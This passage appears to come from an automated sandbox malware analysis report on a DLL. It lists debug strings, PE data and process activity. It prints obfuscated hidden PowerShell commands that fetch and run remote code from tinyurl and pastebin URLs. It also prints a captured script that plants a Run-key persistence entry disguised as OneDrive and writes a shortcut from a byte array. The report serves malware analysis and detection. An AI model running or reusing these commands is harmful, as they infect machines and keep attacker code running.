Source: Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: HQsitBLlOv.dllStatic PE information: section name: _RDATA
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477B4E0 push FFFFFFE8h; retf 6_2_00007FFD3477B4F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347674FB push ebx; iretd 6_2_00007FFD3476756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347755AA push eax; iretd 6_2_00007FFD347755DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34776FD9 push eax; iretd 6_2_00007FFD34776FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34837688 push ds; retf 6_2_00007FFD348376A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348368F3 push 5CC00000h; iretd 6_2_00007FFD34836912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348379F5 push ss; retf 6_2_00007FFD34837A12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD347974EB push ebx; iretd 24_2_00007FFD3479756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3479782E pushad ; iretd 24_2_00007FFD3479785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3479785E push eax; iretd 24_2_00007FFD3479786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34856DC3 push edi; iretd 24_2_00007FFD34856DC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34851736 push 00000061h; iretd 24_2_00007FFD348517AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34856EB8 push FFFFFF8Fh; iretd 24_2_00007FFD34856F63

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,